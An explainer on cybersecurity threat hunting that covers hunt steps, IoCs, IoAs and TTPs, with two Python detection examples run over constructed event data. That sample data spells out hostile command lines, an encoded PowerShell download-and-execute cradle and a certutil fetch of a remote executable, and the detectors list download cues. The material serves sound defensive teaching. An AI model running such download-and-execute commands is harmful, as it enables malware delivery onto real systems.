What is threat hunting in cybersecurity? How does it work? 

10 Feb 2022

Cyber threats appear to be lurking around every corner in today’s technologically driven world. Half the battle lies in recognizing the dangers and assessing the risks associated with them. Knowing how to search for those threats proactively, before they surface as incidents, can save a great deal of difficulty, time, and cost. This is where threat hunting comes into the picture.

What is threat hunting?

Threat hunting is a proactive method in cybersecurity where threat experts hunt for unknown, ongoing, and unaddressed threats across an organization’s network. It leverages different tactics, techniques, and strategies to identify threats in the network that have not yet been detected by existing controls.

What is the primary goal of threat hunting? Why is it important?

The primary purpose of threat hunting is to catch threat actors/threats before they make their move. It aims to identify any ongoing suspicious activities/potential incidents before they cause damage to the infrastructure or have a significant adverse impact on the organization. It assists cybersecurity teams in enhancing cyber readiness against threats. The data from a threat-hunting activity can be useful for devising an effective incident response strategy.

How does threat hunting work?

A threat hunt typically runs as a series of steps, with the output of each step feeding the next:

Step 1: Frame a hypothesis – based on threat intelligence sources and known adversary TTPs

Step 2: Gather data – from endpoints and other sources across the infrastructure, scoped by the hypothesis

Step 3: Identify triggers – anomalous or unusual actions that point towards suspicious activity and may need further investigation

Step 4: Investigate – analyze the triggers, which can be Indicators of Compromise (IoCs) or Indicators of Attack (IoAs)

Step 5: Resolve – communicate findings to the relevant teams so that incident response can be deployed
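The five steps above, carried end to end over a small set of process-creation events. This is an added example written for this page, not code from the original article or from any product it describes. The event layout (Sysmon-style fields), the ATT&CK technique IDs, the hunt hypothesis and every host, user and URL in the sample data are assumptions constructed for illustration.

```python
import base64
import re
from collections import defaultdict
from urllib.parse import urlparse

# Step 1: frame the hypothesis from known TTPs. Technique IDs are cited for
# illustration (T1059.001 PowerShell, T1105 Ingress Tool Transfer).
HYPOTHESIS = {
    "statement": "An adversary runs encoded PowerShell from an Office process "
                 "or uses certutil to pull a second stage over HTTP",
    "techniques": ["T1059.001", "T1105"],
}

OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "mshta.exe"}
DOWNLOAD_CUES = ("downloadstring", "downloadfile", "net.webclient",
                 "invoke-webrequest", "http://", "https://")
URL_RE = re.compile(r"https?://[\w.\-]+(?::\d+)?[/\w.\-]*", re.IGNORECASE)
ENC_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+(\S+)", re.IGNORECASE)


def encode_ps(cmd: str) -> str:
    """Encode a command the way `powershell -enc` expects (UTF-16LE, base64)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    """Reverse of encode_ps; returns "" for anything that is not a valid blob."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


# Step 2: gather data. Constructed process-creation events standing in for an
# EDR/SIEM export; the encoded command is built here so it decodes correctly.
EVENTS = [
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "notepad.exe",
     "cmd": "notepad.exe report.txt"},
    {"host": "ws01", "user": "alice", "parent": "winword.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -nop -w hidden -enc " + encode_ps(
         "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a.ps1')")},
    {"host": "ws02", "user": "bob", "parent": "cmd.exe", "image": "certutil.exe",
     "cmd": "certutil.exe -urlcache -split -f http://198.51.100.23/b.exe b.exe"},
    {"host": "ws03", "user": "svc_backup", "parent": "services.exe", "image": "powershell.exe",
     "cmd": "powershell.exe -File C:\\scripts\\backup.ps1"},
    {"host": "ws01", "user": "alice", "parent": "explorer.exe", "image": "chrome.exe",
     "cmd": "chrome.exe https://intranet.example"},
]


# Step 3: trigger checks. Each returns a short reason, or None when it does not fire.
def office_spawns_shell(ev):
    if ev["parent"].lower() in OFFICE_PARENTS and ev["image"].lower() in SHELLS:
        return f"{ev['parent']} spawned {ev['image']}"
    return None


def encoded_powershell(ev):
    m = ENC_RE.search(ev["cmd"])
    if not (m and ev["image"].lower() == "powershell.exe"):
        return None
    ev["decoded_cmd"] = decode_ps(m.group(1))   # kept for the investigation step
    if any(cue in ev["decoded_cmd"].lower() for cue in DOWNLOAD_CUES):
        return "encoded PowerShell containing a download cue"
    return "encoded PowerShell command"


def certutil_download(ev):
    if ev["image"].lower() == "certutil.exe" and "-urlcache" in ev["cmd"].lower():
        return "certutil used to fetch a remote file"
    return None


CHECKS = [office_spawns_shell, encoded_powershell, certutil_download]


def find_triggers(events):
    """Step 3: copy each event and tag it with every check that fires."""
    hits = []
    for ev in events:
        rec = dict(ev)
        reasons = [r for r in (chk(rec) for chk in CHECKS) if r]
        if reasons:
            hits.append({**rec, "reasons": reasons})
    return hits


def investigate(hits):
    """Step 4: pivot from individual triggers to per-host findings with extracted URLs."""
    by_host = defaultdict(lambda: {"users": set(), "reasons": [], "urls": set()})
    for h in hits:
        f = by_host[h["host"]]
        f["users"].add(h["user"])
        f["reasons"].extend(h["reasons"])
        f["urls"].update(URL_RE.findall(h["cmd"] + " " + h.get("decoded_cmd", "")))
    return {host: {"users": sorted(f["users"]), "reasons": f["reasons"], "urls": sorted(f["urls"])}
            for host, f in by_host.items()}


def hunt(events=EVENTS):
    """Steps 1 to 5 end to end; returns the package handed to incident response."""
    hosts = investigate(find_triggers(events))
    # Step 5: infrastructure seen from more than one host ties the findings into one
    # intrusion and is the first thing IR should block.
    infra = [{urlparse(u).netloc for u in f["urls"]} for f in hosts.values()]
    shared = sorted(set.intersection(*infra)) if len(infra) > 1 else []
    return {"hypothesis": HYPOTHESIS, "hosts": hosts, "shared_infra": shared}


if __name__ == "__main__":
    import json
    print(json.dumps(hunt(), indent=2))
```

Only two of the three hosts running PowerShell produce findings: the scheduled backup on ws03 is an expected baseline use and matches no check, which is the kind of noise a hypothesis scoped to specific TTPs is meant to leave out. The shared destination surfaced in the last step is what turns two separate triggers into one incident.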

What does a typical threat hunting framework look like?

A typical threat hunting framework will have activities like:

  • Curate Indicators of Compromise with contextual information from the SIEM and threat intelligence
  • Understand the baseline conditions of the environment, so that deviations from normal can be recognized
  • Frame a threat hunting hypothesis
  • Collect data from the environment – this could be anything from database alerts to forum posts
  • Engage in hypothesis-based scanning of the environment for threats
  • Correlate with existing methodologies – such as NIST and the MITRE ATT&CK framework

What are some of the common IoCs and IoAs searched for in a threat hunting activity?

Some important Indicators of Compromise searched for in a threat hunting activity are (listed roughly in order of how hard they are for an adversary to change):

  • Hash values
  • IP addresses
  • Domain names
  • Network and host artifacts
  • Tools
  • TTPs

Common examples of Indicators of Attack (IoAs) looked for in a threat hunting activity include:

  • Unexpected activity on the network, such as a sudden excess of data transferred to an external IP address
  • A surge in access requests
  • Unauthorized modifications to files
  • Installation of unauthorized software
  • Modification of system configurations
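The two indicator families above differ in how they are hunted: IoCs are exact matches against a feed, IoAs are deviations from a baseline. This added example, not code from the original article, runs both over constructed telemetry. The indicator values, hosts, users, byte counts and the two thresholds used for the anomaly test are all assumptions chosen for illustration; the IP and domain are reserved documentation values.

```python
import hashlib
import math
from statistics import mean, pstdev

# Indicators of Compromise, as loaded from a threat-intel feed (constructed).
# The hash is of a constructed byte string so the match below is reproducible offline.
IOC = {
    "sha256": {hashlib.sha256(b"constructed-sample-payload").hexdigest()},
    "ip": {"203.0.113.7"},
    "domain": {"update-cdn.example"},
}

# Constructed telemetry.
# File-execution events: (host, path, file content); hashed at match time.
FILE_EVENTS = [
    ("ws01", r"C:\Users\alice\AppData\Local\Temp\svc.exe", b"constructed-sample-payload"),
    ("ws02", r"C:\Program Files\Vendor\app.exe", b"benign-vendor-binary"),
]
# Outbound traffic per host: seven daily totals (MB) as the baseline, then today's flows.
OUTBOUND = {
    "ws01": {"baseline": [41, 38, 45, 40, 43, 39, 42],
             "today": [{"ip": "203.0.113.7", "domain": "update-cdn.example", "mb": 620}]},
    "ws02": {"baseline": [90, 110, 95, 105, 100, 98, 102],
             "today": [{"ip": "198.51.100.5", "domain": "cdn.vendor.example", "mb": 108}]},
}
# Access requests per user: seven hourly counts as the baseline, then the current hour.
ACCESS = {
    "alice":    {"baseline": [12, 15, 11, 14, 13, 12, 16], "now": 14},
    "svc_sync": {"baseline": [200, 210, 195, 205, 199, 203, 201], "now": 230},
    "bob":      {"baseline": [10, 9, 12, 11, 10, 9, 11], "now": 140},
}


def anomalous(baseline, value, z_min=3.0, ratio_min=2.0):
    """IoA test: is `value` far above its baseline? Returns (flagged, z_score, ratio).

    Both gates are required. A very tight baseline (stdev near zero) turns a
    trivial increase into a huge z-score; the ratio gate keeps that from paging
    anyone, while the z-score gate keeps a noisy baseline from hiding a real jump.
    """
    mu, sigma = mean(baseline), pstdev(baseline)
    ratio = value / mu if mu else math.inf
    z = (value - mu) / sigma if sigma else (math.inf if value > mu else 0.0)
    return (z >= z_min and ratio >= ratio_min), z, ratio


def match_iocs(file_events=FILE_EVENTS, outbound=OUTBOUND):
    """Exact-match hunt: file hashes, destination IPs and domains against the IoC set."""
    hits = []
    for host, path, content in file_events:
        digest = hashlib.sha256(content).hexdigest()
        if digest in IOC["sha256"]:
            hits.append({"type": "sha256", "host": host, "value": digest, "where": path})
    for host, data in outbound.items():
        for flow in data["today"]:
            for kind in ("ip", "domain"):
                if flow[kind] in IOC[kind]:
                    hits.append({"type": kind, "host": host, "value": flow[kind], "where": "outbound flow"})
    return hits


def exfil_candidates(outbound=OUTBOUND):
    """IoA: excess data suddenly leaving a host, with its top destination named."""
    out = []
    for host, data in outbound.items():
        total = sum(f["mb"] for f in data["today"])
        flagged, z, ratio = anomalous(data["baseline"], total)
        if flagged:
            top = max(data["today"], key=lambda f: f["mb"])
            out.append({"host": host, "today_mb": total, "z": round(z, 1), "ratio": round(ratio, 1),
                        "top_dst": top["ip"], "known_bad_dst": top["ip"] in IOC["ip"]})
    return out


def access_surges(access=ACCESS):
    """IoA: a surge in access requests by a single principal."""
    surges = []
    for user, d in access.items():
        flagged, _, ratio = anomalous(d["baseline"], d["now"])
        if flagged:
            surges.append({"user": user, "now": d["now"], "ratio": round(ratio, 1)})
    return surges


def run_hunt():
    """Everything a hunter would hand to IR from one pass over this telemetry."""
    return {"ioc_matches": match_iocs(), "exfil": exfil_candidates(), "access_surges": access_surges()}


if __name__ == "__main__":
    import json
    print(json.dumps(run_hunt(), indent=2))
```

Note what the ratio gate does for svc_sync: its hourly count rose by about 14 percent, which is more than six standard deviations above a very flat baseline, yet it is not a surge worth an analyst's time. The ws01 finding is the strong one because the IoA (a 15x jump in outbound volume) and the IoCs (known-bad hash, IP and domain) corroborate each other.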

What is a TTP in threat hunting?

As per MITRE, TTP-based hunting involves collecting and filtering data based on the knowledge of adversary tactics, techniques, and procedures for detecting malicious activity.  

It is a robust approach because it looks for the techniques adversaries must use to achieve their objectives, including the tactics, techniques, and procedures that are common across many adversaries, rather than for artifacts that a single adversary can change cheaply.

What are the different kinds of threat hunting? What are the different methods of threat hunting?

Three types of threat hunting and three methods (or models) are commonly used.

Types of threat hunting:

  • Structured – Hunts are based on the TTPs deployed by an attacker and leverage the MITRE ATT&CK framework, proactively identifying actors before they make a move.
  • Unstructured – Hunts are based on IoC-based triggers and threat intelligence. Threat hunters look for patterns before and after detections, going back to the root cause of the detection.
  • Situational – Hunts are based on a hypothesis about a specific situation (an attack) and industry-based methods.

Methods/Models:

  • Hypothesis-based – A proactive approach that uses hypotheses formed from MITRE ATT&CK framework-based playbooks, IoAs, and TTPs. Hunters catch and isolate threats based on the hypothesis.
  • Intel-based – The hunt is performed using intelligence shared by intelligence agencies and other sources, including IoCs such as IP addresses, networks, host artifacts, and domain names.
  • Custom – A tailored threat hunting activity based on the customer's scope, which can use elements of both intel-based and hypothesis-based hunting.

What is cloud threat hunting?

It is threat hunting focused on attackers who target cloud environments, deploying different TTPs to bypass cloud security measures and leverage security weaknesses in cloud services. Hunters use advanced tools and cloud-based telemetry (for example, cloud audit and access logs) to hunt for undiscovered, ongoing, and hidden threats.

What do you need to perform threat hunting?

The following are some of the things that are needed to perform an effective threat hunting activity:

Human threat hunters – critical alongside automated detection solutions; the hunter frames the hypothesis and judges what the tooling surfaces

Technology – A security solution that performs security data ingestion and storage and offers visibility across the infrastructure, such as an EDR, SIEM, or XDR platform

Threat Intelligence – The latest intelligence on threat actors, including their trends, the security vulnerabilities they leverage, and the tactics, techniques, and procedures they deploy

What is managed threat hunting?

Not every organization has its own security solution and team of cybersecurity experts who can perform threat hunting, given the rising cost of security solutions and the growing cybersecurity skills gap. For those businesses, there is managed threat hunting. It utilizes an external team of cybersecurity professionals who are well-versed in the techniques and tools of threat hunting and incident response.
